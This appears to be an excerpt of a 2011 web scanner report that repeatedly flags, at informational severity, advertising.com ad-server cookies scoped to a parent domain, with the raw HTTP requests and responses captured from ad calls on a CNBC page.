Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
F1=BoRU63EBAAAABAAAAUBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
BASE=x7Q9ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKeJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
ROLL=U6APSjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlO!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
84418946=_4dfa511a,2430472668,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250392290&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=k/k+NFJwHob0Fk6sIWwJoaAjtKPCC0nRdJpwEg02FVMBdbdRFTwihXUxEwjmGVMBxGeRFTAQvaUxEQW4FVMBLppRFTQghXUxEgN5FVMB6ijRFTAmhXUxEAY4FVMBdDmRFTA/yaUxEAVZGVMBYimRFTA3WaUxEQY4FVMBFGeRFTAxBaUxEU1aGVMBbTeRFTQwBaUxEYnXGVMBWGoRFTgQvaUxEogmGVMBxmpRFTQRgaUxE0soGVMB8mpRFHZAmZOiGhZj0jw+NXgbtiGA8Moxj7a+AcsmGPuAEOphAbLuBoKuGj/smJwokaIwzClALRqhAXaxAMdPGQwrQQwdIaQhq62ApVmxuTqHIUbNG7WtrCQIza8IwOICM/oBwB; F1=BQ+T63EBAAAABAAAAQBA+BA; BASE=x7Q9di23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/N!; ROLL=U6APNjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMP!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:53:13 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:53:14 GMT
Connection: close
Set-Cookie: C2=aEl+NFJwHob0Fj6sIWwJoa8itKPCC0nBdJpwEg02FUMBdbdBFTwihXQxEwjmGUMBxGeBFTAQvaQxEQW4FUMBLppBFTQghXQxEgN5FUMB6ijBFTAmhXQxEAY4FUMBdDmBFTA/yaQxEAVZGUMBYimBFTA3WaQxEQY4FUMBFGeBFTAxBaQxEU1aGUMBbTeBFTQwBaQxEYnXGUMBWGoBFTgQvaQxEogmGUMBxmpBFTQRgaQxE0soGUMB8mpBFHZAmZOiGgZj0jw+NXcbtiGA8Mohj7a+AcsmGOuAEOpRAbLuBoKuGi/smJwokaEwzClALRqRAXaxAMdPGPwrQQwdIaMhq62ApVmhuTqHIUbNG6WtrCQIza4IwOICM/oxvB; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: F1=BoRU63EBAAAABAAAAUBA8BA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: BASE=x7Q9ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKeJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: ROLL=U6APSjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlO!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:53:13 GMT; path=/
Set-Cookie: 84418946=_4dfa511a,2430472668,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=9Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
F1=B0fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPsurMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGql9By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
93497556=_4dfa55fd,1831880182,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308251644184&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; GUID=MTMwODIyNzEyNzsxOjE2dDUxa28wOTRrMGt1OjM2NQ; aceRTB=rm%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cam%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Cdc%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Can%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7Crub%3DSat%2C%2016%20Jul%202011%2017%3A56%3A20%20GMT%7C; C2=HTl+NFJwHob0Fg6sIWwJoawitKPCC0nRcJpwEg02FRMBdbdRETwihXExEwjmGRMBxGeRETAQvaExEQW4FRMBLppRETQghXExEgN5FRMB6ijRETAmhXExEAY4FRMBdDmRETA/yaExEAVZGRMBYimRETA3WaExEQY4FRMBFGeRETAxBaExEU1aGRMBbTeRETQwBaExEYnXGRMBWGoRETgQvaExEogmGRMBxmpRETQRgaExE0soGRMB8mpREHZAmZOiGdZj0jw+NXQbtiGA8Moxi7a+AcsmGLuAEOph/aLuBoKuGf/smJwoka4vzClALRqh/WaxAMdPGMwrQQwdIaAhq62ApVmxtTqHIUbNG3WtrCQIzasIwOICM/oBvdr0IwKvG9G; F1=BcMV63EBAAAABAAAAsBA2BA; BASE=x7Q9ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwP!; ROLL=U6APUjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHG!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029516.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 19:14:05 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 620
Date: Thu, 16 Jun 2011 19:14:06 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=9Xl+NFJwHob0Ff6sIWwJoasitKPCC0nBcJpwEg02FQMBdbdBETwihXAxEwjmGQMBxGeBETAQvaAxEQW4FQMBLppBETQghXAxEgN5FQMB6ijBETAmhXAxEAY4FQMBdDmBETA/yaAxEAVZGQMBYimBETA3WaAxEQY4FQMBFGeBETAxBaAxEU1aGQMBbTeBETQwBaAxEYnXGQMBWGoBETgQvaAxEogmGQMBxmpBETQRgaAxE0soGQMB8mpBEHZAmZOiGcZj0jw+NXMbtiGA8Mohi7a+AcsmGKuAEOpR/aLuBoKuGe/smJwoka0vzClALRqR/WaxAMdPGLwrQQwdIa8gq62ApVmhtTqHIUbNG2WtrCQIzaoIwOICM/oxudr0IwKvGAH; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: F1=B0fV63EBAAAABAAAAwBA0BA; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: BASE=x7Q9li23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5Kdse5YdLmQk/tY7KQgKe5GmLixINBY7uyr5mZqiQCHOlSr37nk7zuuytsX+/PNnXEVdwPsurMOKDL!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: ROLL=U6APVjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotpW7CQ8JMfjkHZFUlOy7ezWe0kEmjAGnCzv+jvvGKndKOIZB/g+cLdnWpK7KosVuHGql9By7NO!; domain=advertising.com; expires=Sat, 15-Jun-2013 19:14:05 GMT; path=/
Set-Cookie: 93497556=_4dfa55fd,1831880182,768034^1029516^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N1558.126262.AOLPERFORMANCENETWO/B5584755.3;sz=728x90;pc=[TPAS_ID];click=http://r1-ads.ace.advertising.com/click/s
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=1Yf+NFJwHob0Fv7sIWwJoasntKfBC0nxeKpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
F1=BUj953EBAAAABAAAAMAAUEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
2746764=_4df9f635,8183003516,804480^981602^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; C2=YFf+NFJwHob0Fz7sIWwJoa8ntKfBC0nxfKpwEg02FkNBdbdBZTwihXQ2EwjmGkNBxGeBZTAQvaQ2EQW4FkNBLppBZTQghXQ2EgN5FkNB6ijBZTAmhXQ2EAY4FkNBdDmBZTA/yaQ2EAVZGkNBYimBZTA3WaQ2EQY4FkNBFGeBZTAxBaQ2EU1aGkNBbTeBZTQwBaQ2EYnXGkNBWGoBZTgQvaQ2EogmGkNBxmpBZTQRgaQ2E0soGkNB8mpBZDrnA8ekGyQkBAAoNXMDmZOiGeKtyBw2saIDNSPC73cBw1KaAwzgGevr5Dwxaa49CQ4kGRtt4Kgq4aIDzamAjSqRUPLUCsEpGRdpFDw09Y8FvCBB3hoxYC; F1=BgV853EBAAAABAAAAIAAcEA; BASE=x7Q9Pi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0B!; ROLL=U6APAje2RKFWN9uaB4l2AhB!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.981602.804480.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 12:25:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 665
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 12:25:25 GMT
Connection: close
Set-Cookie: C2=1Yf+NFJwHob0Fv7sIWwJoasntKfBC0nxeKpwEg02FgNBdbdBYTwihXA2EwjmGgNBxGeBYTAQvaA2EQW4FgNBLppBYTQghXA2EgN5FgNB6ijBYTAmhXA2EAY4FgNBdDmBYTA/yaA2EAVZGgNBYimBYTA3WaA2EQY4FgNBFGeBYTAxBaA2EU1aGgNBbTeBYTQwBaA2EYnXGgNBWGoBYTgQvaA2EogmGgNBxmpBYTQRgaA2E0soGgNB8mpBYDrnA8ekGuQkBAAoNX8CmZOiGaKtyBw2sa4CNSPC73cBw1KaAwzgGavr5Dwxaao9CQ4kGNtt4Kgq4a4CzamAjSqRTPLUCsEpGNdpFDw09YsFvCBB3hoxXC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: F1=BUj953EBAAAABAAAAMAAUEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: BASE=x7Q9Qi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: ROLL=U6APBje2RKFWN9uaB4l2AhxSqVDmeNF!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:25:25 GMT; path=/
Set-Cookie: 2746764=_4df9f635,8183003516,804480^981602^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390405/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000804480/mnum=0000981
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

C2=YFf+NFJwHob0Fz7sIWwJoa8ntKfBC0nxfKpwEg02FkNBdbdBZTwihXQ2EwjmGkNBxGeBZTAQvaQ2EQW4FkNBLppBZTQghXQ2EgN5FkNB6ijBZTAmhXQ2EAY4FkNBdDmBZTA/yaQ2EAVZGkNBYimBZTA3WaQ2EQY4FkNBFGeBZTAxBaQ2EU1aGkNBbTeBZTQwBaQ2EYnXGkNBWGoBZTgQvaQ2EogmGkNBxmpBZTQRgaQ2E0soGkNB8mpBZDrnA8ekGyQkBAAoNXMDmZOiGeKtyBw2saIDNSPC73cBw1KaAwzgGevr5Dwxaa49CQ4kGRtt4Kgq4aIDzamAjSqRUPLUCsEpGRdpFDw09Y8FvCBB3hoxYC; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
F1=BgV853EBAAAABAAAAIAAcEA; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
BASE=x7Q9Pi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxBFe8Bbf0B!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
ROLL=U6APAje2RKFWN9uaB4l2AhB!; domain=advertising.com; expires=Sat, 15-Jun-2013 12:04:40 GMT; path=/
76077167=_4df9f158,6884555565,804480^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860 HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; BURL1=tGu1NBKvZTFMIYXH1444q3SyX69B==; GUID=MTMwODAxMDQ0NTsxOjE2dDUxa28wOTRrMGt1OjM2NQ; A07L=3nk4AeYyv6xVEfe8Z9bY4WiTtx8BJRQVLsUBWYK8PItaPHIY5TRLepQ; C2=s6e+NFJwHob0F17sIWwJoaEotKfBC0nRgKpwEg02FmNBdbdhZTwihXY2EwjmGmNBxGehZTAQvaY2EQW4FmNBLpphZTQghXY2EgN5FmNB6ijhZTAmhXY2EAY4FmNBdDmhZTA/yaY2EAVZGmNBYimhZTA3WaY2EQY4FmNBFGehZTAxBaY2EU1aGmNBbTehZTQwBaY2EYnXGmNBWGohZTgQvaY2EogmGmNBxmphZTQRgaY2E0soGmNB8mphZDrnA8ekG0QkBAAoNXUDmZOiGgKtyBw2saQDNSPC73cBw1KaAwzgGgvr5DwxaaA+CQ4kGTtt4Kgq4aQDzamAjSqxUPLUCsEpGTdpFDw09YEGvCBB3hoRZC; F1=Bwq753EBAAAABAAAAEAAgEA; BASE=x7Q9Oi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYnL8A8d0iDEOliUSEDbOxB!; ROLL=U6APDje2RKFWN9O!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956559.804480.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 12:04:40 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 12:04:40 GMT
Connection: close
Vary: Accept-Encoding
